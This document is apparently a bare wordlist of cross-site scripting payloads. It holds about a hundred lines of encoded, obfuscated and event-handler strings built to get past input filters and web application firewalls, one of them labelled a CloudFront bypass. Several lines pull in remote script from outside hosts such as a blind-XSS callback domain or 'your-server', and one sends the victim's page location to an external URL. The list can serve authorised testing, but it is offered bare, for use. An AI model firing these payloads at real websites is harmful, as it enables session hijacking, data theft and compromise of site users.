<style>@keyframes%20a{}b{animation:a;}</style><b/onanimationstart=p&#x60;>
<SCr%00Ipt>confirm(1)</scR%00ipt>
<svg><script href=data />
<Img Src=//X55.is OnLoad%0C=x>
'"><A+href=%2522+AutoFocus+OnFocus=top/**/?.['ale'%2B'x'](1)>
self[/*foo*/'alert'/*bar*/](/*foo*//*bar*/)
self[/*foo*/'alert'/*bar*/](self[/*foo*/'document'/*bar*/]['domain'])
'"><A+href=%2522+AutoFocus+OnFocus=(((ddd)))()>
'"><A+href=%2522+AutoFocus+OnFocus=top[8680439..toString`30`]?.(1)>
bleh'"><A HRef=\" AutoFocus OnFocus=x>
'"><A+href=%2522+AutoFocus+OnFocus=top[1..toString`30`]?.(1)>
<a href="&#12;javascript:x">Test</a>
<img src=x x=x&#40cu&#41>
1'"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'x'](1)>
<details%0Aopen%0AonToGgle%0A=%0Aabc=(co\u006efirm);abc%28%60xss%60%26%2300000000000000000041//>
bleh.pw"+style='animation-name:x' onanimationend='x'></a><style>@keyframes x{}</style>
<base+href=https://x55.is>
<https://fb.com/onfocus=1?x(1):1+AutoFocus+ContentEditable>
%22%20accesskey=a%20onclick=x%3E
#"></div><a href= javascript&colon;z&lpar;document&period;domain)
<img src=data: x=&Xopf;=x;&Xopf;(1)>
%3Cinput+onfocus%3d%27/*=*/Function(%22ale%22%2b%22rt(document.domain)%22)();//%27autofocus+
<a/tabindex="999"/autofocus/id="&quot;"onfocus=(x)()>clickmeclickme
<iframe src="&#x6a;&#65;vAScrIpt&colon;alert&lpar;1&rpar;"></iframe>
%3CScript%20src=data:text/javascript,x%3E%3C/Script%3E
<details/open/id="&quot;"ontoggle=js>
canary%22%3E%0D%0A%0D%0A%3Cx%20%27=%22foo%22%3E%3Cx%20foo=%27%3E%3Cimg%20src=x%20asdf=javascript:x(%60cloudfrontbypass%60)//%27%3E
%0d%0a%0d%0a<x+'="foo"><x+foo='><img+src=x+asdf=javascript:x(`cloudfrontbypass`)//'>
%0d%0a%0d%0a<x%20'="foo"><x%20foo='><img%20src=x%20dafasf=javascript:x(`cloudfrontbypass`)//'>
<img/ignored=()%0Asrc=x%0Aonerror=js>
<form onclick=z><input id=attributes>Click me
javascript:var{a:onerror}={a:plert};throw%20document.domain
<img src=data: onerror="x&emsp;(1)">d
<xss xss=parent[/xx/.source+/ert/.source](1)>
<TexTArEa/*%00//%00*/a="not"/*%00///x////x=x`1`%20//>
<svg%20onx=()%20onload=(confirm)(document.domain)>
<details/open=/Open/href=/data=;+ontoggle="(z)(z)
<details/open=/Open/href=/data=+ontoggle="(z)(z)
<a"/onclick=x>Click%20Here!
<details open id="' &quot;'"ontoggle=x>
<marquee+loop=1+width=0+onfinish='new+Function`al\ert\`1\``'>
<svg><circle><set%20onbegin=prompt(1)%20attributename=fill>
a='xx';parent[a](2)
<object+data=x>
<svg/x=parent[/al/.source.concat(/x/.source)](2)>
<img/srcdoc=x>
<embed+data=x>
<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a()%20x>
"><body/oNpagEshoW=(x)(d)>
<details/open=/Open/href=/data=; ontoggle="c
"%3balert`1`%3b"
<a%20href%3D"javascript%0A%3Ax">XSS
asd"`>%20onpointerenter=x=prompt,x`XSS`
<x%20onauxclick=import('//1152848220/')>click
<x%20onauxclick=a=x,a(domain)>click%20-@niksthehacker
<x%20onauxclick=import('//1152848220/')>click
<x%20onauxclick=import('//xss/')>click
\"<>onauxclick<>=(eval)(atob(`YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ==`))>+<sss
{{constructor.constructor(x`1`)()}}
javascript:new%20Function`al\ert\`1\``;
xhzeem*/eval?.(value+/()/.source)//"><input value=confirm autofocus onfocus='/*"
<xhzeem/x=" onmouseover=eva&#x6c;?.(id+/(document.domain)/.source) id=confirm>
<script>Object.prototype.BOOMR%20=%201;Object.prototype.url='https://portswigger-labs.net/xss/xss.js'</script>%20-https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
"><a/\test="%26quot;x%26quot;"href='%01javascript:/*%b1*/;location.assign("//hackerone.com/stealthy?x="+location)'>Click
<details%0Aopen%0AonToGgle%0A=%0Aabc=(co\u006efirm);abc%28%60xss%60%26%2300000000000000000041//
location=%27javasCript:xxx\x281\x29%27
%0A%0D%0A%0D%22%3C!%3E!%0D%0Atarget=%22_blank%22%0D%0Aonclick=%0D%0A%22%0D%0Ax=window[%27pr%27%2b%27o%27%2b%27m%27+%2b%27pt%27](%271%27)(%271%27)%0D%0Aompt,%0D%0Ax`Tiktok`
%EF%BC%9Cscript%EF%BC%9EPromPt(%EF%BC%9C/script%EF%BC%9E
'"%EF%BC%9E%EF%BC%9Cs%EF%BC%9E
\u0022\u003c%26quot;%26gt;%26lt;&#x22;&#x27;&#x3e;\"';}};“></textarea></SCRIPT><img src=x onerror=x>${{7*7}}
\u0022\u003c&quot;&gt;&lt;&#x22;&#x27;&#x3e;\"';}};“></textarea></SCRIPT><img/src/onerror=x>${{7*7}}
\u0022\u003c%26quot;%26gt;%26lt;\"';}};“></textarea></SCRIPT><script/src=//abc.bxss.in></script>{{7*7}}
';"/></textarea></script><script/src=//abc.bxss.in></script>
<details/open=/open/href=/data=;+ontoggle="(x)(x)> 
<svg onload=prompt%26%230000000040document.domain)> 
<noscript><p%20title="</noscript><img%20src=x%20onerror=prompt``>">
<scr<script>ipt>x</scr</script>ipt>
JavaScript://%250x?.x//
<IMG SRC=1 ONERROR=&#X61;&#X6C;&#X65;&#X72;&#X74;(1)>
<xss onpointercancel=x>XSS</xss>
<form onclick=x><input id=attributes>Click me
"><img src=x onerrora=confirm() onerror=confirm(1)>
navigation.navigate('javascript:adf')
<svg><animate onbegin=a attributeName=x dur=1s>
<a%20href%3D"jav%26NewLine%3Bas%26Tab%3Bcript%26colon%3Bx">
<a href="jav&NewLine;as&Tab;cript&colon;x">
<a%20href%3D"jav%26%23x00000000000061script%26colon%3Bx">
<style>@-webkit-keyframes slidein {}</style><a style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onwebkitanimationiteration=x></xss>
<xss onwebkitmouseforceup=x>XSS</xss>
<xss onwebkitmouseforcewillbegin=x>XSS</xss>
<xss onwebkitmouseforceup=x>XSS</xss>
<xss onwebkitmouseforcedown=x>XSS</xss>
<xss onwebkitmouseforcechanged=x>XSS</xss>
<audio onwebkitplaybacktargetavailabilitychanged=df>
\u{00000003c}s\u{00000003e}bleh\u003cs\u003ebleh\x3cs\x3ebleh&#x3c;s&#x3e;bleh&lt;s&gt;bleh\u{000022}\u{000000023}" bleh'\"><s>bleh
<button style=”color:red” popovertarget=”x” value=”Click me”>Click Me</button><hvita onbeforetoggle=with(document){xx=createElement(‘script’);xx.setAttribute(‘src’,’https://your-server/x.js');body.appendChild(xx)} popover id=x>Hvita</hvita>
aaa&#x3C;a href=javas&#x26;#99;ript:alert(1)&#x3E;click
<x/onclick=globalThis&lsqb;'\u0070r\u006f'+'mpt']&lt;)>clickme   
tarun"><x/onafterscriptexecute=confirm%26lpar;)// 
<a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />click
<details/open/ontoggle="self['wind'%2b'ow']['one'%2b'rror']=self['wind'%2b'ow']['ale'%2b'rt'];throw/**/self['doc'%2b'ument']['domain'];">
<svg onload\r\n=$.globalEval("al"+"ert()");>
<bleh/onclick=top[/al/.source+/ert/.source]&Tab;``>
<sVg OnPointerEnter="location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//</div"><a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='test'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />tap
<A AutoFocus HRef%252F=""OnFocus=top/**/?.['z'+'erzt']``>
<Img Src=//X55.is OnLoad%0c=import(src)//
<Img Src=//X55.is OnLoad%0c=d//
<A+HRef=//X55.is+AutoFocus+%26%2362+OnFocus%0C=import(href)>
<A+HRef=//X55.is+AutoFocus+%26%2362+OnFocus%0C=x>
"><input type="hidden" oncontentvisibilityautostatechange="c(/Bypassed/)" style="content-visibility:auto">
